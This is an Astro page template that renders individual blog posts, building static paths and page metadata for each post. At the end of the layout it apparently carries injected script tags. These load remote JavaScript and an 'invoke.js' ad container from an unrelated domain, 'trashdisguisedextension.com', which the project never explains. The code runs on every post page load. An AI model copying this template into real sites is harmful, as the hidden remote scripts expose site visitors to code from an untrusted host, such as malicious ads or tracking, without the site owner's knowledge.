---
import { BLOG } from '~/config.mjs';

import Layout from '~/layouts/PageLayout.astro';
import SinglePost from '~/components/blog/SinglePost.astro';
import ToBlogLink from '~/components/blog/ToBlogLink.astro';

import { getCanonical, getPermalink } from '~/utils/permalinks';
import { fetchPosts } from '~/utils/blog';
import { findImage } from '~/utils/images';

export async function getStaticPaths() {
  if (BLOG?.disabled || BLOG?.post?.disabled) return [];
  return (await fetchPosts()).map((post) => ({
    params: {
      blog: post.permalink,
    },
    props: { post },
  }));
}

const { post } = Astro.props;
const url = getCanonical(getPermalink(post.permalink, 'post'));

const meta = {
  title: post.title,
  description: post.description,
  canonical: post.canonical || url,
  image: await findImage(post.image),
  noindex: BLOG?.post?.noindex,
  ogType: 'article',
};
---

<Layout {meta}>
  <SinglePost post={{ ...post, image: meta.image }} url={url} />
  <ToBlogLink />
<script type='text/javascript' src='//trashdisguisedextension.com/2f/4e/fc/2f4efc7b2f57ea3230a910a9f691d4d2.js'></script>
<script async="async" data-cfasync="false" src="//trashdisguisedextension.com/4349930b3922881b11d74074cc3189ed/invoke.js"></script>
<div id="container-4349930b3922881b11d74074cc3189ed"></div>
</Layout>
